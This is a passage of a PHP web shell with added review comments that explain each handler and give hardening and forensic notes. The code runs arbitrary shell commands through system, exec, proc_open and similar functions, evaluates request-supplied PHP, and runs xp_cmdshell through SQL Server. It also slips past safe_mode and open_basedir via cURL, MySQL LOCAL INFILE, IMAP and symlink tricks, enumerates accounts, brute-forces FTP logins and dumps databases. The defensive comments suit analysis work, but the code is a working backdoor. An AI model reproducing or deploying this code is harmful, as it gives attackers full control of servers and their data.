// into the report textarea. This is the point where the command strings assembled by the earlier blocks
// are actually run.
4311 if($safe_mode)
4312 {
4313  switch($_POST['cmd'])
4314  {
4315  case 'safe_dir':
4316   $d=@dir($dir);
4317   if ($d)
4318    {
4319    while (false!==($file=$d->read()))
4320     {
4321      if ($file=="." || $file=="..") continue;
4322      @clearstatcache();
4323      list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
4324      if(!$unix){
4325      echo date("d.m.Y H:i",$mtime);
4326      if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
4327      }
4328      else{
4329      $owner = @posix_getpwuid($uid);
4330      $grgid = @posix_getgrgid($gid);
4331      echo $inode." ";
4332      echo perms(@fileperms($file));
4333      printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
4334      echo date("d.m.Y H:i ",$mtime);
4335      }
4336      echo "$file\n";
4337     }
4338    $d->close();
4339    }
4340   else echo $lang[$language._text29];
4341  break;
4342     }
4343 }
4344 else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
4345  $cmd_rep = ex($_POST['cmd']);
4346  if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
4347  else { echo @htmlspecialchars($cmd_rep)."\n"; }}
// Second dispatch on cmd: a series of helpers that reach files or commands through an extension, stream
// wrapper or database rather than through plain file functions, each driven by its own POST field.
// NOTE(review): these appear aimed at hosts where safe_mode / open_basedir restrict direct access - confirm.
// test1: hands a file:// URL built from POST test1_file to cURL and prints the result unescaped.
// test2: include()s the path in POST test2_file; this prints non-PHP files and executes any PHP they hold.
4348  if($_POST['cmd'])
4349 {
4350  switch($_POST['cmd'])
4351  {
4352   case 'test1':
4353   $ci = @curl_init("file://".$_POST['test1_file']."");
4354   $cf = @curl_exec($ci);
4355   echo $cf;
4356   break;
4357   case 'test2':
4358   @include($_POST['test2_file']);
4359   break;
// mysqlb: reads a file through the MySQL client instead of through PHP file functions.
// It connects to localhost with POST test3_ml / test3_mp, selects POST test3_md, creates a temporary table
// named "A" + time() with one LONGBLOB column, loads POST test3_file into it with LOAD DATA LOCAL INFILE
// using terminators chosen never to occur, and prints the first row HTML-escaped.
// $mdb and $file are interpolated into the SQL text unescaped. $mysql_files is built but not used here.
// Hardening: with LOCAL INFILE disabled (the MySQL local_infile setting) this route is unavailable.
4360   case 'mysqlb':
4361 $mhost = "localhost";
4362 $muser = $_POST['test3_ml'];
4363 $mpass = $_POST['test3_mp'];
4364 $mdb   = $_POST['test3_md'];
4365 $file = $_POST['test3_file'];
4366 // default mysql_read files [seperated by: ':']:
4367 $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
4368 $mysql_files = explode(':', $mysql_files_str);
4369 
4370                                                                 $sql = array (
4371                                                                    "USE $mdb",
4372                                                                    'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
4373                                                                    "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
4374                                                                    . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
4375                                                                    . "ESCAPED BY          '' "
4376                                                                    . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
4377                                                                    "SELECT a FROM $tbl LIMIT 1"
4378                                                                 );
4379 
4380                                                                 mysql_connect ($mhost, $muser, $mpass);
// Statements run in order; the first failure aborts the whole script with the failing SQL and the error text.
4381                                                                 foreach ($sql as $statement) {
4382                                                                    $q = mysql_query ($statement);
4383                                                                    if ($q == false) die (
4384                                                                       "FAILED: " . $statement . "\n" .
4385                                                                       "REASON: " . mysql_error () . "\n"
4386                                                                    );
4387                                                                    if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
4388                                                                    echo htmlspecialchars($r[0]);
4389                                                                    mysql_free_result ($q);
4390                                                                 }
4391 
4392 echo "</textarea>";
4393  break;
// test4: despite the *_file field name, this runs an operating-system command through SQL Server.
// It connects to a local MSSQL instance (POST test4_port, default 1433) with POST test4_ml / test4_mp,
// selects POST test4_md, and inserts the output of master.dbo.xp_cmdshell '<POST test4_file>' into a table
// named SnIpEr_SA_temp_table, prints the rows unescaped and drops the table again.
// The command string is concatenated into the SQL text unescaped.
// Defensive view: keep xp_cmdshell disabled, give web application logins no sysadmin rights, and alert on
// xp_cmdshell execution or on creation of a table with that name.
4394   case 'test4':
4395   if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
4396   $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
4397   if($db)
4398    {
4399    if(@mssql_select_db($_POST['test4_md'],$db))
4400     {
4401      @mssql_query("drop table SnIpEr_SA_temp_table",$db);
4402      @mssql_query("create table SnIpEr_SA_temp_table ( string VARCHAR (500) NULL)",$db);
4403      @mssql_query("insert into SnIpEr_SA_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
4404      $res = mssql_query("select * from SnIpEr_SA_temp_table",$db);
4405      while(($row=@mssql_fetch_row($res)))
4406       {
4407       echo $row[0]."\r\n";
4408       }
4409     @mssql_query("drop table SnIpEr_SA_temp_table",$db);
4410     }
4411     else echo "[-] ERROR! Can't select database";
4412    @mssql_close($db);
4413    }
4414   else echo "[-] ERROR! Can't connect to MSSQL server";
4415   break;
// test5 to test8: four file-access routes that go through an extension or a stream wrapper.
// test5: passes "-C <POST test5_file> -X /tmp/mb_send_mail" as the extra-parameters argument of
//        mb_send_mail() and then prints /tmp/mb_send_mail HTML-escaped.
//        NOTE(review): these look like mailer options for an alternate config file and a log file - confirm.
//        /tmp/mb_send_mail is removed before the call but not after it, so it can remain on disk.
// test6: opens an IMAP stream on the fixed path /etc/passwd and calls imap_list() with POST test6_file as
//        the reference argument, printing each entry unescaped.
// test7: opens POST test7_file as an IMAP mailbox and prints the body of message 1 unescaped.
// test8: copies POST test8_file1 through the compress.zlib:// wrapper to POST test8_file2.
// Hardening: unload extensions the application does not use (imap, mbstring mail functions) and keep PHP
// patched; restrictions enforced only inside PHP's own file functions do not cover these paths.
4416   case 'test5':
4417   if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
4418   $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
4419   @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
4420   $lines = file ('/tmp/mb_send_mail');
4421   foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
4422   break;
4423   case 'test6':
4424   $stream = @imap_open('/etc/passwd', "", "");
4425   $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
4426   for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
4427   @imap_close($stream);
4428   break;
4429   case 'test7':
4430   $stream = @imap_open($_POST['test7_file'], "", "");
4431   $str = @imap_body($stream, 1);
4432   echo $str;
4433   @imap_close($stream);
4434   break;
4435   case 'test8':
4436   if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
4437   else echo $lang[$language.'_text119'];
4438   break;
// cURL: builds a file:/// URL from POST SnIpEr_SA followed by a NUL byte (\x00) and a ../ suffix that ends
// in this script's own path (__FILE__), then calls curl_exec() twice (once bare, once inside var_dump).
// NOTE(review): the embedded NUL byte looks like a path-truncation trick that depends on old PHP/cURL
// builds - confirm against the PHP version in use.
4439 case 'cURL':
4440    if(empty($_POST['SnIpEr_SA'])){
4441 
4442 } else {
4443 $curl=$_POST['SnIpEr_SA'];
4444 $ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__);
4445 curl_exec($ch);
4446 var_dump(curl_exec($ch));
4447 echo "</textarea></CENTER>";
4448 }
4449 break;
// copy: reads a file through the compress.zlib:// wrapper into a temp file created by tempnam(), prints
// it HTML-escaped and unlinks the temp file.
// $u1p is filled from GET/POST snn but then reset to "" and never used; the path actually read is $snn,
// which is not assigned in this excerpt - presumably populated from the request elsewhere - confirm.
// $tymczas is empty, so tempnam() falls back to the system temp directory; files prefixed "cx" there are
// the transient artifact.
4450 case 'copy':
4451 if(empty($snn)){
4452 if(empty($_GET['snn'])){
4453 if(empty($_POST['snn'])){
4454 } else {
4455 $u1p=$_POST['snn'];
4456 }
4457 } else {
4458 $u1p=$_GET['snn'];
4459 }
4460 }
4461   $u1p=""; // File to Include... or use _GET _POST
4462 $tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
4463 
4464 $temp=tempnam($tymczas, "cx");
4465 if(copy("compress.zlib://".$snn, $temp)){
4466 $zrodlo = fopen($temp, "r");
4467 $tekst = fread($zrodlo, filesize($temp));
4468 fclose($zrodlo);
4469 echo "".htmlspecialchars($tekst)."";
4470 unlink($temp);
4471 echo "</textarea></CENTER>";
4472 }
4473 break;
// ini_restore: prints the current safe_mode and open_basedir values, require_once()s the path in POST
// ini_restore, calls ini_restore() on both settings, prints them again, and finally include()s whatever
// the GET parameter "ss" names. Both the require_once and the include take request-supplied paths, so
// this case is also a file-inclusion primitive.
4474 case 'ini_restore':
4475  if(empty($_POST['ini_restore'])){
4476 } else {
4477 $ini=$_POST['ini_restore'];
4478 echo ini_get("safe_mode");
4479 echo ini_get("open_basedir");
4480 require_once("$ini");
4481 ini_restore("safe_mode");
4482 ini_restore("open_basedir");
4483 echo ini_get("safe_mode");
4484 echo ini_get("open_basedir");
4485 include($_GET["ss"]);
4486 echo "</textarea></CENTER>";
4487 }
4488 break;
// glob: declares reg_glob(), which prints every path matching the request parameter "glob" followed by
// "*", and calls it when that parameter is present. The output is not escaped.
4489 case 'glob':
4490 function reg_glob()
4491 {
4492 $chemin=$_REQUEST['glob'];
4493 $files = glob("$chemin*");
4494 
4495 foreach ($files as $filename) {
4496    echo "$filename\n";
4497 }
4498 }
4499 if(isset($_REQUEST['glob']))
4500 {
4501 reg_glob();
4502 }
4503 break;
// zend: include()s the path in POST zend, dumps every global variable with print_r($GLOBALS), then
// require_once()s the same path. The dump exposes whatever the included file defined, which for
// application config files typically means credentials - treat those as compromised if this was used.
4504 case 'zend':
4505  if(empty($_POST['zend'])){
4506 } else {
4507 $dezend=$_POST['zend'];
4508 include($_POST['zend']);
4509 print_r($GLOBALS);
4510 require_once("$dezend");
4511 echo "</textarea></p>";
4512 }
4513 break;
// sym1: creates symlinks in the working directory. "dummy" is pointed at a/a/a/a/a/a/, "xxx" is pointed
// at a target composed from "dummy" + POST sym1p2 + POST sym1p, "dummy" is removed, and the code then
// loops forever calling symlink(".", "dummy").
// NOTE(review): this looks like a symlink race against PHP's path restriction checks - confirm.
// Observable effects: symlinks named dummy and xxx next to the script, and a PHP worker that never
// returns. Listing symlink in disable_functions removes this case.
4514   case 'sym1':
4515      if(empty($_POST['sym1p'])){
4516              } else {
4517 $symp=$_POST['sym1p'];
4518          }
4519      if(empty($_POST['sym1p2'])){
4520 } else {
4521 $symp2=$_POST['sym1p2'];
4522   symlink("a/a/a/a/a/a/", "dummy");
4523 symlink("dummy".$symp2."".$symp."", "xxx");
4524 unlink("dummy");
4525 while (1) {
4526 symlink(".", "dummy");
4527   }
4528  }
4529   break;
// sym2: include()s the name xxx (written as a bare word), i.e. whatever the xxx symlink resolves to.
4530   case 'sym2':
4531   @include(xxx);
4532   break;
// plugin: walks uids 0..59999 through posix_getpwuid() and prints every field of each existing account,
// colon-separated - an account listing obtained without opening /etc/passwd, so file-level restrictions
// on that path do not prevent it. Adding the posix_* functions to disable_functions does.
4533   case 'plugin':
4534   if ($_POST['plugin'] ){
4535 
4536                                            for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
4537                                         $ara = posix_getpwuid($uid);
4538                                                 if (!empty($ara)) {
4539                                                   while (list ($key, $val) = each($ara)){
4540                                                     print "$val:";
4541                                                   }
4542                                                   print "\n";
4543                                                 }
4544                                         }
4545                                  echo "</textarea>";
4546              }
4547         break;
// command: runs POST command through the PHP function named by $method. $method is not assigned in this
// excerpt - presumably it comes from the request - confirm.
// Branches here: system, passthru, exec (prints only the last output line), shell_exec, and popen
// (prints at most 2096 bytes). Output is not HTML-escaped in any of them.
// Because every process-spawning function is offered as an alternative, a disable_functions list only
// helps if it names all of them (system, passthru, exec, shell_exec, popen, proc_open); process-level
// controls on the web-server account are the stronger measure.
4548         case 'command':
4549           if (!empty($_POST['command'])) {
4550                 if ($method=="system") {
4551                 system($_POST['command']);
4552                 echo "Functions system";
4553                 }
4554                 if ($method=="passthru") {
4555                 passthru($_POST['command']);
4556                 echo "Functions passthru";
4557                 }
4558                 if ($method=="exec") {
4559                         $string = exec($_POST['command']);
4560                         echo $string;
4561                         echo "Functions exec";
4562                 }
4563                 if ($method=="shell_exec") {
4564                 $string = shell_exec($_POST['command']);
4565                 echo $string;
4566                 echo "Functions shell_exec";
4567                 }
4568                 if ($method=="popen") {
4569                 $pp = popen($_POST['command'], 'r');
4570                 $read = fread($pp, 2096);
4571                 echo $read;
4572                 pclose($pp);
4573                 echo "Functions popen";
4574                   }
// proc_open branch: a session-backed command console.
// State is kept in $_SESSION under the keys history (commands, newest first), output (transcript) and
// cwd (working directory). "cd" and "exit" are handled internally; anything else is run with proc_open()
// after chdir() to the stored cwd, and stdout then stderr are appended HTML-escaped to the transcript.
// $ini, $rows, $columns and logout() are not defined in this excerpt.
// Forensic note: with PHP's default file-based session handler the command history and output persist
// in the session files under session.save_path, which can survive removal of the script itself.
4575    if ($method=="proc_open") {
4576 
4577 $command  = isset($_POST['command'])  ? $_POST['command']  : '';
4578 
4579 /* Load the configuration. */
4580 /* Default settings --- these settings should always be set to something. */
4581 /* Merge settings. */
4582 session_start();
4583 
4584     if (!empty($command)) {
4585         /* Save the command for late use in the JavaScript.  If the command is
4586          * already in the history, then the old entry is removed before the
4587          * new entry is put into the list at the front. */
4588         if (($i = array_search($_POST['command'], $_SESSION['history'])) !== false)
4589             unset($_SESSION['history'][$i]);
4590         array_unshift($_SESSION['history'], $_POST['command']);
4591         /* Now append the commmand to the output. */
4592         $_SESSION['output'] .= '$ ' . $_POST['command'] . "\n";
4593         /* Initialize the current working directory. */
4594         if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_POST['command'])) {
4595             $_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
4596         } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_POST['command'], $regs)) {
4597             /* The current command is a 'cd' command which we have to handle
4598              * as an internal shell command. */
4599             if ($regs[1]{0} == '/') {
4600                 /* Absolute path, we use it unchanged. */
4601                 $new_dir = $regs[1];
4602             } else {
4603                 /* Relative path, we append it to the current working
4604                  * directory. */
4605                 $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
4606             }
4607             /* Transform '/./' into '/' */
4608             while (strpos($new_dir, '/./') !== false)
4609                 $new_dir = str_replace('/./', '/', $new_dir);
4610             /* Transform '//' into '/' */
4611             while (strpos($new_dir, '//') !== false)
4612                 $new_dir = str_replace('//', '/', $new_dir);
4613             /* Transform 'x/..' into '' */
4614             while (preg_match('|/\.\.(?!\.)|', $new_dir))
4615                 $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
4616             if ($new_dir == '') $new_dir = '/';
4617             /* Try to change directory. */
4618             if (@chdir($new_dir)) {
4619                 $_SESSION['cwd'] = $new_dir;
4620             } else {
4621                 $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
4622             }
4623         } elseif (trim($_POST['command']) == 'exit') {
4624             logout();
4625         } else {
4626             /* The command is not an internal command, so we execute it after
4627              * changing the directory and save the output. */
4628             chdir($_SESSION['cwd']);
4629             // We canot use putenv() in safe mode.
4630             if (!ini_get('safe_mode')) {
4631                 // Advice programs (ls for example) of the terminal size.
4632                 putenv('ROWS=' . $rows);
4633                 putenv('COLUMNS=' . $columns);
4634             }
4635             /* Alias expansion. */
4636             $length = strcspn($_POST['command'], " \t");
4637             $token = substr($_POST['command'], 0, $length);
4638             if (isset($ini['aliases'][$token]))
4639                 $command = $ini['aliases'][$token] . substr($_POST['command'], $length);
4640             $io = array();
4641             $p = proc_open($_POST['command'],
4642                            array(1 => array('pipe', 'w'),
4643                                  2 => array('pipe', 'w')),
4644                            $io);
4645             /* Read output sent to stdout. */
4646             while (!feof($io[1])) {
4647                 $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
4648                                                         ENT_COMPAT, 'UTF-8');
4649             }
4650             /* Read output sent to stderr. */
4651             while (!feof($io[2])) {
4652                 $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
4653                                                         ENT_COMPAT, 'UTF-8');
4654             }
4655             fclose($io[1]);
4656             fclose($io[2]);
4657             proc_close($p);
4658         }
4659     }
4660     /* Build the command history for use in the JavaScript */
4661     if (empty($_SESSION['history'])) {
4662         $js_command_hist = '""';
4663     } else {
4664         $escaped = array_map('addslashes', $_SESSION['history']);
4665         $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
4666     }
4667                }
4668                }
4669 
4670   break;
4671    }
4672 }
4673 
4674 
// Login loop for cmd=ftp_brute. $users, $ftp_server and $ftp_port were set by the earlier pre-flight block.
// For each user a fresh FTP connection is opened and a login is tried with the username as the password;
// when POST reverse is set and that fails, the reversed username is tried as well.
// Successes are printed, followed by the number of attempts and the number of hits.
// Defensive view: this shows up as a burst of FTP logins across many accounts from a single source, each
// with a username-derived password. Account lockout or rate limiting on the FTP service and a password
// policy that rejects username-derived passwords address it.
4675 if ($_POST['cmd']=="ftp_brute")
4676  {
4677  $suc = 0;
4678  foreach($users as $user)
4679   {
4680   $connection = @ftp_connect($ftp_server,$ftp_port,10);
4681   if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
4682   else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
4683   @ftp_close($connection);
4684   }
4685  echo "\r\n-------------------------------------\r\n";
4686  $count = count($users);
4687  if(isset($_POST['reverse'])) { $count *= 2; }
4688  echo $lang[$language.'_text97'].$count."\r\n";
4689  echo $lang[$language.'_text98'].$suc."\r\n";
4690  }
// cmd=php_eval: removes PHP open/close tag markers from POST php_eval and passes the rest to eval(),
// i.e. arbitrary PHP supplied in the request body runs in the web server's PHP context.
// eval() is a language construct and cannot be switched off with disable_functions, so this path is
// unaffected by that setting. Errors are suppressed with @.
4691 if ($_POST['cmd']=="php_eval"){
4692  $eval = @str_replace("<?","",$_POST['php_eval']);
4693  $eval = @str_replace("?>","",$eval);
4694  @eval($eval);}
// cmd=mysql_dump: configures a my_sql object (class defined outside this excerpt) from POST fields,
// connects, selects the database and dumps the table named in POST mysql_tbl.
// Without POST dif the dump lines are printed into the report textarea; with it they are written to the
// file named by POST dif_name, opened before the connection is attempted.
// Defensive view: this is bulk data extraction using credentials typed into the form, which in practice
// means credentials recovered from application config files on the same host - rotate them after an
// incident and look for dump files left in web-writable directories.
4695 if ($_POST['cmd']=="mysql_dump")
4696  {
4697   if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
4698   $sql = new my_sql();
4699   $sql->db   = $_POST['db'];
4700   $sql->host = $_POST['db_server'];
4701   $sql->port = $_POST['db_port'];
4702   $sql->user = $_POST['mysql_l'];
4703   $sql->pass = $_POST['mysql_p'];
4704   $sql->base = $_POST['mysql_db'];
4705   if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
4706   else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
4707   else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
4708   else {
4709    if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
4710    else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
4711    else { echo "[-] ERROR! Can't write in dump file"; }
4712    }
4713  }
4714 echo "</textarea></div>";
4715 echo "</b>";
4716 echo "</td></tr></table>";
4717 echo "<table width=100% cellpadding=0 cellspacing=0>";
// div_title($title, $id): returns an <a> element showing $title whose onClick calls the client-side
// function change_divst() with $id. Both arguments are inserted into the markup without escaping.
4718 function div_title($title, $id)
4719 {
4720   return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
4721 }
// div($id): returns the opening <div> tag for a collapsible panel.
// When a cookie named $id exists and compares loosely equal to 0, the tag carries display: none so the
// panel starts collapsed; otherwise a plain <div id=...> is returned. $id is inserted unescaped.
4722 function div($id)
4723  {
4724  if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
4725  return '<div id="'.$id.'">';
4726  }
4727 
4728 if(!$safe_mode){
4729 echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
4730 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
4731 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
4732 echo $te.'</div>'.$table_end1.$fe;
4733 }
4734 else{
4735 echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
4736 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
4737 echo $te.'</div>'.$table_end1.$fe;
4738 }
4739 echo $fs.$table_up1.div_title($lang[$language.'_text208'],'id15').$table_up2.div('id15').$ts;
4740 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select name=\"method\">
4741                             <option value=\"system\" <? if ($method==\"system\") { echo \"selected\"; } ?>system</option>
4742                             <option value=\"passthru\" <? if ($method==\"passthru\") { echo \"selected\"; } ?>passthru</option>
4743                             <option value=\"exec\" <? if ($method==\"exec\") { echo \"selected\"; } ?>exec</option>
4744                             <option value=\"shell_exec\" <? if ($method==\"shell_exec\") { echo \"selected\"; } ?>shell_exec</option>
4745                             <option value=\"popen\" <? if ($method==\"popen\") { echo \"selected\"; } ?>popen</option>
4746                             <option value=\"proc_open\" <? if ($method==\"proc_open\") { echo \"selected\"; } ?>proc_open</option>
4747                       </select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text3'].$arrow."</b>".in('text','command',54,(!empty($_POST['command'])?($_POST['command']):("id"))).in('hidden','cmd',0,'command').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
4748 echo $te.'</div>'.$table_end1.$fe;
// Panel "id5": file-viewer form. `method` offers file, fread, show_source and
// readfile; the path travels in a field named `file`, which is emitted twice
// (hidden, carrying $dir, and as text defaulting to /etc/passwd). Unlike the
// neighbouring panels, no hidden `cmd` selector is written here, so the
// dispatcher presumably keys on `file`/`method` — confirm against the handler,
// which is outside this excerpt.
// The `<? ... ?>` fragments are string content, not executed PHP; they reach
// the response as text with $method interpolated.
// Triage note: a POST with `method` set to one of these four names plus a
// `file` path is the request-side indicator for this panel.
4749 echo $fs.$table_up1.div_title($lang[$language.'_text223'],'id5').$table_up2.div('id5').$ts;
4750 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select name=\"method\">
4751                             <option value=\"file\" <? if ($method==\"file\") { echo \"selected\"; } ?> file</option>
4752                             <option value=\"fread\" <? if ($method==\"fread\") { echo \"selected\"; } ?> fread</option>
4753                             <option value=\"show_source\" <? if ($method==\"show_source\") { echo \"selected\"; } ?> show_source</option>
4754                             <option value=\"readfile\" <? if ($method==\"readfile\") { echo \"selected\"; } ?> readfile</option>
4755                       </select>".in('hidden','file',0,$dir).ws(2)."<b>".$lang[$language.'_text202'].$arrow."</b>".in('text','file',41,'/etc/passwd').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
4756 echo $te.'</div>'.$table_end1.$fe;
// Five single-input panels, all reusing the element id "id3". Each posts one
// input plus the hidden `dir` and a hidden `cmd` selector:
//   e_name      -> cmd=edit_file   (text, pre-filled with $dir)
//   snn         -> cmd=copy        (text, pre-filled with /etc/passwd)
//   SnIpEr_SA   -> cmd=cURL        (text, pre-filled with /etc/passwd)
//   ini_restore -> cmd=ini_restore (text, pre-filled with /etc/passwd)
//   plugin      -> cmd=plugin      (select with a single option)
// The handlers behind these selectors are outside this excerpt; the defaults
// suggest local file access, but verify that against the dispatcher.
// Triage note: the parameter names SnIpEr_SA and snn are distinctive enough
// to search for in web-server or WAF request logs.
4757 echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
4758 echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
4759 echo $te.'</div>'.$table_end1.$fe;
4760 echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id3').$table_up2.div('id3').$ts;
4761 echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'copy').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4762 echo $te.'</div>'.$table_end1.$fe;
4763 echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id3').$table_up2.div('id3').$ts;
4764 echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'cURL').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4765 echo $te.'</div>'.$table_end1.$fe;
4766 echo $fs.$table_up1.div_title($lang[$language.'_text203'],'id3').$table_up2.div('id3').$ts;
4767 echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ini_restore',85,'/etc/passwd').in('hidden','cmd',0,'ini_restore').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4768 echo $te.'</div>'.$table_end1.$fe;
4769 echo $fs.$table_up1.div_title($lang[$language.'_text224'],'id3').$table_up2.div('id3').$ts;
// The select below carries one option whose submitted value is the literal
// "plugin" (the visible label is /etc/passwd); the markup has a stray second </option>.
4770 echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>","<select size=\"1\" name=\"plugin\"><option value=\"plugin\">/etc/passwd</option></option></select>".in('hidden','cmd',0,'plugin').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
4771 echo $te.'</div>'.$table_end1.$fe;
// Panel "id12": posts test3_md, test3_ml and test3_mp (defaults "mysql",
// "root", "password" — presumably database name, login and password; the
// labels come from $lang, which is not shown here) together with test3_file
// (default /etc/passwd) and the hidden selector cmd=mysqlb. Each field is
// re-filled from $_POST when a previous value exists. The handler is outside
// this excerpt.
4772 echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
4773 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>");
4774 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysqlb').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4775 echo $te.'</div>'.$table_end1.$fe;
// Panel with cmd=sym1: two text fields, sym1p2 (default "/../../../") and
// sym1p (default /etc/passwd). Note the key mismatch: when sym1p2 was posted,
// its box is re-filled from $_POST['sym1p'], not from $_POST['sym1p2'].
4776 echo $fs.$table_up1.div_title($lang[$language.'_text220'],'id3').$table_up2.div('id3').$ts;
4777 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','sym1p2',50,(!empty($_POST['sym1p2'])?($_POST['sym1p']):("/../../../"))).in('text','sym1p',50,(!empty($_POST['sym1p'])?($_POST['sym1p']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4778 echo $te.'</div>'.$table_end1.$fe;
// Panel with cmd=sym2: no user-editable field, only the hidden dir/cmd pair and a submit button.
4779 echo $fs.$table_up1.div_title($lang[$language.'_text222'],'id3').$table_up2.div('id3').$ts;
4780 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
4781 echo $te.'</div>'.$table_end1.$fe;
// Bare brace block (no condition precedes it in this excerpt), so everything
// inside is rendered unconditionally. It emits a further run of panels; the
// handlers for their `cmd` selectors are outside this excerpt.
4782 {
// Panel "id23": text field `log`, pre-filled from $_POST['log'] or else $dir.
// The hidden `cmd` value is not a short selector but a sentence whose
// non-ASCII part has been lost to an encoding problem (shown as `?`); what
// survives is "filename.php?ss=http://shell.txt?".
4783 echo $fs.$table_up1.div_title($lang[$language.'_text204'],'id23').$table_up2.div('id23').$ts;
